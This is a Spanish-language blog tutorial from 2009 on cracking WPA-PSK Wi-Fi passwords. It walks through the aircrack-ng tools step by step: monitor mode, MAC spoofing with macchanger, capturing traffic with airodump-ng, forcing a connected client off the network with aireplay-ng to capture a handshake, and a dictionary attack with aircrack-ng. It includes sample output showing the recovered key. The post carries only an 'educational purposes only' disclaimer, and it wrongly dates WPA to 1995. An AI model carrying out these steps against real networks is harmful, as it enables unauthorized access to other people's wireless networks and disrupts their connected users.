16 de diciembre de 2009

Cómo crackear WPA-PSK

Crackear WPA-PSK

¿Qué es WPA-PSK?

Quote Wikipedia: “WPA (Wi-Fi Protected Access - 1995 - Acceso Protegido Wi-Fi) es un sistema para proteger las redes inalámbricas (Wi-Fi); creado para corregir las deficiencias del sistema previo WEP.

WPA-PSK: WPA Pre-Shared Key. Modalidad donde la clave es preestablecida y se pone en el router.

¿Cómo se crackea?

No es necesario esnifear mucho trafico. Por eso, aunque la cantidad de trafico no es importante su nivel de seguridad es mucho mayor debido a que los posibles atacantes deben tener paciencia para encontrar el trafico correcto. Este trafico correcto donde se realizan las presentaciones entre estaciones cliente y los punto de acceso se le denomina como “handshakes”.

Una clave WPA-PSK se crackea mediante un diccionario. El diccionario que yo utlizaré es de unos 2GB. Lo podéis descargar aquí.

*En este tutorial todas las mac y bssid están falsificados*
Empezemos…

Ponemos a nuestra tarjeta wireless en modo monitor y le cambiamos la mac. Después, empezamos a capturar tráfico de la red que queramos.

Pasos:

1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
  • airmon-ng stop eth1
2- Parar la tarjeta para poder fijarla en modo monitor (2).
  • ifconfig eth1 down
3- Cambiar la ruta mac.
  • macchanger --mac 00:11:22:33:44:55 eth1
4- Iniciar tarjeta en modo monitor.
  • airmon-ng start eth1
5- Iniciar airodump para ver las redes inalámbricas disponibles.
  • airodump-ng eth1
6- Iniciar airodump con la red especificada.
  • airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1
En este ejemplo hay un cliente conectado. Pues bien, para conseguir algunos paquetes en claves WPA hay que conseguir handshake. Estos los conseguiremos gracias a la deauntentificación del cliente (más aqui).

Deaunteficiación a un cliente:
  • aireplay-ng -0 30 -a (Aqui va el BSSID) -c (MAC cliente) (Nombre de la tarjeta de red)

Que en este ejemplo:

aireplay-ng -0 30 -a 00:16:38:F2:D5:E1 -c 00:19:7E:6D:AC:AC eth1
16:27:11 Waiting for beacon frame (BSSID: 00:16:38:F2:D5:E1) on channel 3
16:27:12 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [83|10 ACKs]
16:27:13 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [68| 1 ACKs]
16:27:14 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [13| 3 ACKs]
16:27:15 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [70|38 ACKs]

- Una vez conseguido los paquetes necesarios (se intentar a partir de 10 data) aplicaremos nuestro diccionario para ir probando las claves.

Para ello, abrimos otra consola y escribimos:
  • aircrack-ng (nombre archivo output) -w (ruta diccionario)
En nuesto caso quedaría:
aircrack-ng output-02.cap -w /root/pass_habituales.txt

----------------------------------------------------------------------------------

Le damos un enter y:

Aircrack-ng 1.0 rc1 r1085


[00:00:01] 162 keys tested (103.96 k/s)


KEY FOUND! [ 123MONZISEZ456 ]


Master Key : F0 CA 6C 0A 13 95 17 AF 72 2D F4 FE 0D 78 EF F3
99 EE DE 07 C4 EB B5 C2 5B DF 33 36 AE 7D FC DC

Transcient Key : 0C CE 37 B4 95 77 C7 51 30 0A 1A 49 D1 91 BE 0B
CF 2C 3F 65 87 BF 11 AC 07 F2 B7 37 C7 92 A7 B4
7F 6A A5 F5 B4 DF 1F 42 41 15 B5 0D A3 6B FC 07
8C 04 97 30 63 2D 33 6A CE DA 63 F9 0E F6 99 28

EAPOL HMAC : 21 ED BD DA 1D 55 43 10 E9 52 E7 75 E9 C5 53 A5

-----------------------------------------------------------------------------------
TUTORIAL BY MONZI_SEZ
EDUCATIONAL PURPOSES ONLY
16 de Diciembre de 2009.

2 comentarios: